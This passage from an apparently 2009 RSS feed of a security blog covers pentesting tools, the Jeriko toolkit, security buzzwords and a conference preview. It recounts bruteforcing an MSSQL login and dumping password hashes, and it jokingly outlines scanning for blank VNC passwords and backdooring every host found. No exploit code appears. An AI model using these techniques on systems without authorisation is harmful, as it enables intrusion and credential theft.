href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/xg_PlnFWsew" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Tools of Trade</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/o6_JqQcAlGk/</link>
         <description>I wish I had the ultimate tool, whether that is a programing language such as perl, python and ruby, or whether it is a framework like metasploit and vulnerability scanner like nessus. I wish, but I know that such thing doesn&amp;#8217;t exist and probably never will. Lately I&amp;#8217;ve been dropping a lot bash scripts on public forums and of course on work related projects. Many people came back to me asking why I chose bash. Python or perl would have been better! [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2842</guid>
         <pubDate>Fri, 10 Apr 2009 13:18:31 -0700</pubDate>
         <content:encoded><![CDATA[<p>I wish I had the ultimate tool, whether that is a programing language such as perl, python and ruby, or whether it is a framework like metasploit and vulnerability scanner like nessus. I wish, but I know that such thing doesn&#8217;t exist and probably never will.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/hckyso/3191642647/"><img src="http://farm4.static.flickr.com/3255/3191642647_70b39632f9.jpg?v=1231794403" alt="Tools of Trade"/></a></div> <p>Lately I&#8217;ve been dropping a lot bash scripts on public forums and of course on work related projects. Many people came back to me asking why I chose bash. <q>Python or perl would have been better!</q> While I agree that both python and perl are a lot more expressive, I disagree that tools in general should be written just to accommodate the needs of a particular framework. Tools are tools and they have their lifetime just like everything else. So should we bother?</p> <p>Recently I had to communicate with a MSSQL server on a pentesting job. For that purpose I&#8217;ve downloaded sqsh. Unfortunately the tool failed with a linking error. So I decided to go and download the sources and compile. I did that but the build failed because my environment was lacking certain unusual environment variables the tool needed to build successfully. Alright, running out of time, I decided to check whether there are other tools for SQL server. I found dbishell which is a tool written in perl. Run the tool for Sybase backend but it complained that I am missing libraries. So I downloaded the dbi sybase perl libraries and installed them. I run the tool again but it failed with an error. It couldn&#8217;t display the error because I was lacking another perl library.</p> <p>Ok, that was ridiculous and I desperately needed a solution. So I came up with something I do not normally do. I checked PHP&#8217;s sybase integration online and I found that it is relatively straightforward to communicate with MSSQL backends from PHP scripts. I wrote a simple script to bruteforce the login with several passwords I had at hand. Once I found the login, lucky me, I wrote another script, again in PHP, just to dump various information from the database such as other database users and their hashes. Lucky me!</p> <div class="message">In summary, I spent ridiculous amount of time trying to make established frameworks and tools to work while I could have saved all the hustle and started with PHP from the beginning.</div> <p>The reason I am telling you this story is because I have an important message convey here: <q>Tools are just Tools!</q> If metasploit cannot exploit the vulnerability perhaps you can create something yourself. If nessus fails to detect a problem, perhaps there is another approach you should use to handle the situation. We often start a new framework or tool and suddenly decide that it should handle all situations. Well that is virtually impossible! The situation always change.</p> <p>So, don&#8217;t stick to a single tool just because it works 80% of the time. And don&#8217;t waste time trying to make the tool work in the rest 20%. It is pointless, especially when you are dealing with frameworks. There are a lot more elegant solutions out there you can employ to solve your particular problem. These solutions may not be elegant and perhaps they are written in something as unconventional as <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Brainfuck">brainfuck</a>, but they are solutions nevertheless.</p> <p><em>Remember, tools solve problems! If a tool cannot solve the problem it is no longer a tool. It is a useless blob!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/o6_JqQcAlGk" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>More Penetration Testing Goodness with Jeriko</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/QZBD7XGSM3E/</link>
         <description>Over the last couple of weeks I&amp;#8217;ve added more features to the Jeriko toolkit which I briefly covered in my post over here. For those of you who don&amp;#8217;t know, Jeriko is a compilation of various bash scripts to ease manual penetration testing practices. The idea is to automate only the things which are sort of boring. Anyway, now you have a few more scripts at your disposal. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2835</guid>
         <pubDate>Tue, 07 Apr 2009 14:14:29 -0700</pubDate>
         <content:encoded><![CDATA[<p>Over the last couple of weeks I&#8217;ve added more features to the <a rel="nofollow" target="_blank" href="http://code.gnucitizen.org/jeriko">Jeriko</a> toolkit which I briefly covered in my post over <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/you-dont-need-the-ultimate-pen-testing-framework/">here</a>. For those of you who don&#8217;t know, Jeriko is a compilation of various bash scripts to ease manual penetration testing practices. The idea is to automate only the things which are sort of boring.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/geishaboy500/2777962535/"><img src="http://farm4.static.flickr.com/3172/2777962535_208b4ac418.jpg?v=0" alt="Lightpainting Tools"/></a></div> <p>Anyway, now you have a few more scripts at your disposal. The most notable changes are the ability to discover service versions via <code>extract-services</code>, the ability to discover and generate URLs from services which offer HTTP (courtesy of <code>generate-url-batch</code>, <code>expand-url-credentials</code> and <code>expand-url-dirs</code>) and the ability to grab screenshots of all web servers via <code>scan-browsers</code>.</p> <p>Personally, I find the <code>scan-browsers</code> script extremely useful. Let&#8217;s say that you encounter a bunch of web servers but you don&#8217;t know what they are for. You can fire the browser and start executing URLs one after another but that will take time and you can easily get confused. Instead of doing that you can do the following:</p> <pre><code>$ generate-url-batch | scan-browsers</code></pre> <p>This command will iterate over each discovered HTTP server and take a screenshot of the front page. The script can be safely executed even in environments which do not have the X server installed. In fact, you do not need it at all, because the script relays on a virtual framebuffer server.</p> <p>After the command completes, you will have your current working directory populated with the screen grabs. Now you can use your default picture viewer to see all web servers quite rapidly. This script is also handy in pentests when you need to take evidence of particular vulnerable web servers/applications.</p> <p><em>Although Jeriko is already useful, I am planning to totally redesign the platform. Future versions will have more granular control over the pentesting process and the ability to automate large chunks of boring activities.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/QZBD7XGSM3E" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>On Security Buzzwords</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/pBLmO4nVvmA/</link>
         <description>I&amp;#8217;ve got quite a lot of good feedback on the security buzzword generator I announced yesterday. For those of you who do not know, the generator is a fun little utility part of the GNUCITIZEN campaigns which helps you with coming up with new and exciting buzzwords like a security pro. We often laugh when a new buzzword makes its rounds in the media but the matter of fact is that buzzwords are important. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2826</guid>
         <pubDate>Fri, 03 Apr 2009 02:36:08 -0700</pubDate>
         <content:encoded><![CDATA[<p>I&#8217;ve got quite a lot of good feedback on the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/cmpgn/security-buzzword-generator">security buzzword generator</a> I <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/security-buzzword-generator/">announced yesterday</a>. For those of you who do not know, the generator is a fun little utility part of the GNUCITIZEN campaigns which helps you with coming up with new and exciting buzzwords like a security pro.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/goingnature/3081998237/"><img src="http://farm4.static.flickr.com/3281/3081998237_56cd1e0b4d.jpg?v=0" alt="Locative Dynamics"/></a></div> <p>We often laugh when a new buzzword makes its rounds in the media but the matter of fact is that buzzwords are important. In essence, buzzwords are just terminology which happens to be used extensively by the media. I find it funny to follow rants of people who are obviously against buzzwords but they make use of buzzwords themselves. If you are against them, just don&#8217;t use them. I am curious to see how you are going to find a common language with the rest of the world.</p> <p>Here are a few examples of security buzzwords which are considered an everyday terminology nowadays:</p> <ul>
<li>Null Pointer Dereference</li>
<li>Cross-site Scripting</li>
<li>Rebinding Attacks</li>
<li>Botnets</li>
<li>Storm Worm</li>
<li>Virtualized Rootkits</li>
<li>there are tones more&#8230;</li>
</ul> <p>They are buzzwords because at some point they were virtually all over the Web. Today&#8217;s buzzwords is Conficker. If you find something new and intriguing it most certainly will become a buzzword. Is that really that bad?</p> <h3>Q&#038;A with the Public</h3> <p>I have a question to the public. <q>Dear Reader, what do you call a script injection exploit which happens withing the boundaries of the browser&#8217;s chrome?</q></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/pBLmO4nVvmA" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Security Buzzword Generator</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/y3PpG9le2Rs/</link>
         <description>In the light of the Month of New Security Buzzwords, I am releasing an online fuzzer to help you generate as many security buzzwords as you like. Sweet! Jokes aside, tools like this one are quite helpful to brainstorm new ideas. If you ever do research inspired by our buzzword generator, please give us a credit. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2819</guid>
         <pubDate>Thu, 02 Apr 2009 04:27:25 -0700</pubDate>
         <content:encoded><![CDATA[<p>In the light of the <a rel="nofollow" target="_blank" href="http://www.cgisecurity.com/2009/04/month-of-new-security-buzzwords.html">Month of New Security Buzzwords</a>, I am releasing an online <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/cmpgn/security-buzzword-generator">fuzzer</a> to help you generate as many security buzzwords as you like. Sweet!</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/nickoneill/99773518/"><img src="http://farm1.static.flickr.com/25/99773518_62aa62b5ce.jpg?v=0" alt="The at&#038;t ad that I want to see"/></a></div> <p><em>Jokes aside, tools like this one are quite helpful to brainstorm new ideas. If you ever do research inspired by our buzzword generator, please give us a credit. That way we will know that the tool is actually useful.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/y3PpG9le2Rs" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>No Frameworks but Environments</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/jCo1jHXStho/</link>
         <description>We certainly don&amp;#8217;t need the ultimate pentesting framework but we can make use of the ultimate pen-testing environment. This is sort of pre-announcement of a tool I am currently working on, different from jeriko, which I hope will improve the way we do pentests. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2815</guid>
         <pubDate>Wed, 18 Mar 2009 03:51:21 -0700</pubDate>
         <content:encoded><![CDATA[<p>We certainly <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/you-dont-need-the-ultimate-pen-testing-framework/">don&#8217;t need the ultimate pentesting framework</a> but we can make use of the ultimate pen-testing environment.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/toner/47112062/"><img src="http://farm1.static.flickr.com/32/47112062_8bffc0b86a.jpg?v=0" alt="environments 5"/></a></div> <p>This is sort of pre-announcement of a tool I am currently working on, different from <a rel="nofollow" target="_blank" href="http://code.gnucitizen.org/jeriko/">jeriko</a>, which I hope will improve the way we do pentests. The tool is in its early stage of development and I could make use of several JavaScript coders if someone is up for the challenge.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/jCo1jHXStho" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>CONFidence 2009 coming up soon!</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/gBfOBg2zuYc/</link>
         <description>The new edition of CONFidence is coming up soon! CONFidence, which has become one of the biggest technical IT security conferences in Europe, is taking place on 15-16 May in the beautiful city of Krakow. This is the fifth year CONFidence is taking place, and there have been several changes introduced. First of all there will be two simultaneous tracks after lunch time, whereas previous editions only offered one track all day. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2773</guid>
         <pubDate>Sat, 14 Mar 2009 06:47:47 -0700</pubDate>
         <content:encoded><![CDATA[<p>The new edition of <a rel="nofollow" target="_blank" href="http://2009.confidence.org.pl/">CONFidence</a> is coming up soon! CONFidence, which has become one of the biggest technical IT security conferences in Europe, is taking place on 15-16 May in the beautiful city of <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Krak%C3%B3w">Krakow</a>.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/static/blog/2009/03/confidence.png"><img src="http://www.gnucitizen.org/static/blog/2009/03/confidence.png" title="CONFidence 2009"/></a></div> <p>This is the fifth year CONFidence is taking place, and there have been several changes introduced. First of all there will be two simultaneous tracks after lunch time, whereas previous editions only offered one track all day. Also, this year introduced the <strong>Hackers&#8217; Squad</strong>, which sounds to me like a great idea for learning and having fun at the same time. The following is mentioned on the CONFidence website regarding the Hackers&#8217; Squad:</p> <blockquote><p>During 5th edition of CONFidence you have a unique chance to stay at the coolest spot in the city Hackers&#8217; Squad. It is a place where hacking never stops!</p> <p>We decided to rent the whole hostel (or even group of hostels if it&#8217;s necessary) and turn it into the real hacking space a place to sleep, to party and to hack &#8211; only for CONFidence attendees.</p></blockquote> <p>Last year pdp and I had a blast at the event, which we found to be one of the best organized security cons we&#8217;ve been too. To date, I can say that CONFidence and <a rel="nofollow" target="_blank" href="http://conference.hackinthebox.org/">HITBSecConf</a> &#8211; aka Hack in the Box &#8211; are probably my two favorite hacker events. Unfortunately, pdp won&#8217;t be speaking at CONFidence this year, but he will be busy presenting at other events such as <a rel="nofollow" target="_blank" href="http://conference.auscert.org.au/conf2009/">AusCERT 2009</a>.</p> <h3>My humble talk on credit card theft</h3> <p>I&#8217;d like to personally thank Andrzej Targosz for inviting me to speak this year, making it the second time I&#8217;ll deliver a presentation at CONFidence. I hope my presentation will be interesting and entertaining enough for the audience. This is the abstract for my talk:</p> <blockquote><p>You are a security geek, you specialize in pentesting, but somehow during your career you&#8217;ve had to deal with PCI DSS. Yes, PCI DSS can be very boring, I feel your pain! Pentesters usually don&#8217;t like standards because they understand that there is only so much they can do to help organizations protect their information assets. On top of that, pentesters usually like to experiment which goes against the principle of boring audit checklists.</p> <p>In this presentation, we will cover PCI DSS and credit card security from a (hopefully) fun perspective, with a focus on credit card theft techniques. How are merchants and service providers being compromised? How about us consumers? What loopholes currently exist in the PCI DSS standards which still allow unsophisticated attackers to compromise credit card data?</p> <p>This presentation is <em>not</em> brought to you by a PCI DSS expert, but rather a frustrated pentester who will attempt to show you that PCI DSS and credit card security in general can be a fun topic! Knowledge learned from performing pentests and from working with QSAs who have assessed compromised data centers will be shared.</p></blockquote> <p>Of course, if you have any thoughts on things you think I should cover in my presentation I&#8217;m all ears!</p> <h3>Talks I&#8217;m interested in</h3> <p>I must say that there are quite a few presentations that look interesting, but it was <a rel="nofollow" target="_blank" href="http://2009.confidence.org.pl/prelegenci/rich-smith">Rich Smith</a>&#8217;s abstract on attacking VNC that caught my eye the most.</p> <p>The reason why I&#8217;m interested in this talk is because Rich is basically answering a question I asked myself a long time ago when the infamous <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/archive/1/433994/30/0/threaded">VNC auth bypass vuln</a> was discovered: can we programmatically run commands via the Remote Frame Buffer (RFB) protocol which VNC relies on? It seems that Rich has done a heck of a job at answering this question!</p> <p>I remember exploiting the VNC auth bypass bug during pentest assessments. Basically, once you gained access to the desktop two things could happen: 1) the screen is locked and you&#8217;re stuck, 2) the screen is unlocked and you gain access to the currently-logged-in user&#8217;s session.</p> <p>In the second case, you can obviously do anything including running commands of course. So if the logged-in user has admin privileges on the box, it&#8217;s a full compromise pretty much. However, the attack can be very noisy, since the attacker is graphically interacting with the desktop. For instance, imagine if the admin was physically sitting in front of the compromised system while watching someone else opening the command prompt, etc. Another scenario which can arouse suspicion is the admin remotely VNCing into the box. If the attacker also connects via VNC to the same box, that would kill the admin&#8217;s VNC session. Quite noisy as you can imagine.</p> <p>So my question back then was, <em>could someone programmatically compromise a box via VNC and then launch a malicious payload?</em> i.e.: adding a new OS account. I must say that I dug a bit back then and it&#8217;s not as trivial as it sounds, which is what Rich is arguing in his presentation, although he did manage to write a python library and suite of tools for automating tasks like this.</p> <p>Think of the following automatic task:</p>
<ol> <li>scan boxes for blank VNC passwords</li> <li>if blank pass allowed, then backdoor system</li> <li>continue scanning</li>
</ol> <p><em>Fun indeed!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/gBfOBg2zuYc" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Codez Are Up</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/-bajiIRJLbs/</link>
         <description>This is a quick announcement just to let you know that our codes are now getting synced at code.gnucitizen.org, which is basically a file browser interface to the source repositories. The reason I had to come up with something like this is because most of our projects are dispersed across several Google Code repositories, personal SVNs and many other places. We have started so many ideas in the past that now it is hard to keep track of everything. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2768</guid>
         <pubDate>Wed, 11 Mar 2009 07:18:54 -0700</pubDate>
         <content:encoded><![CDATA[<p>This is a quick announcement just to let you know that our codes are now getting synced at <a rel="nofollow" target="_blank" href="http://code.gnucitizen.org">code.gnucitizen.org</a>, which is basically a file browser interface to the source repositories.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/lofi/398077393/"><img src="http://farm1.static.flickr.com/147/398077393_873acbecaa.jpg?v=0" alt="Coding can kill"/></a></div> <p>The reason I had to come up with something like this is because most of our projects are dispersed across several Google Code repositories, personal SVNs and many other places. We have started so many ideas in the past that now it is hard to keep track of everything. Also, many people ask us for the source codes of old projects and we simply don&#8217;t know where to point them to.</p> <p><em>Not everything is added yet. I will keep putting stuff in!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/-bajiIRJLbs" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>New Facebook XSS Vulnerabilities</title>
         <link>http://blog.blogsecurify.com/2008/12/new-facebook-xss-vulnerabilities.html</link>
         <description>There was some buzz today about &lt;a rel="nofollow" target="_blank" href="http://www.xssed.com/news/80/New_highly_critical_Facebook_XSS_vulnerabilities_pose_serious_privacy_risks/"&gt;four new Facebook XSS vulnerabilities announced&lt;/a&gt;. XSS (cross site scripting) is nothing new for Facebook but it's interesting since there is a pretty impressive worm called Koobface still making it's way around the Facebook user base (&lt;a rel="nofollow" target="_blank" href="http://www.pcworld.com/businesscenter/article/155462/koobface_virus_spreads_to_bebo.html"&gt;now spreading to Bebo&lt;/a&gt;). Koobface spread easily through social engineering techniques and XSS has been used to assist with similar types of attacks in the past. Interesting to see if there will be a combo Koobface/XSS type attack in the future. &lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;I won't go into a ton of detail about these new vulnerabilities but for a very good write up on these flaws and how they might relate to other attacks going on with social media check out &lt;a rel="nofollow" target="_blank" href="http://blogs.zdnet.com/security/?p=2308"&gt;Dancho Danchev's article over at zdnet&lt;/a&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-6897842020367284740?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-6897842020367284740</guid>
         <pubDate>Mon, 15 Dec 2008 18:34:00 -0800</pubDate>
      </item>
      <item>
         <title>Miss “Accountable” 2008</title>
         <link>http://www.spinhunters.org/blog/miss-accountable-2008/</link>
         <description>The beauty award this year goes to the International Federation of Organic Agriculture Movements (IFOAM), followed by the European Bank of Reconstruction and Development and Unicef. The lowest reputation scores, however, were received by International Olympic Committee and NATO. Not surprising at all ! [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=174</guid>
         <pubDate>Fri, 12 Dec 2008 12:23:39 -0800</pubDate>
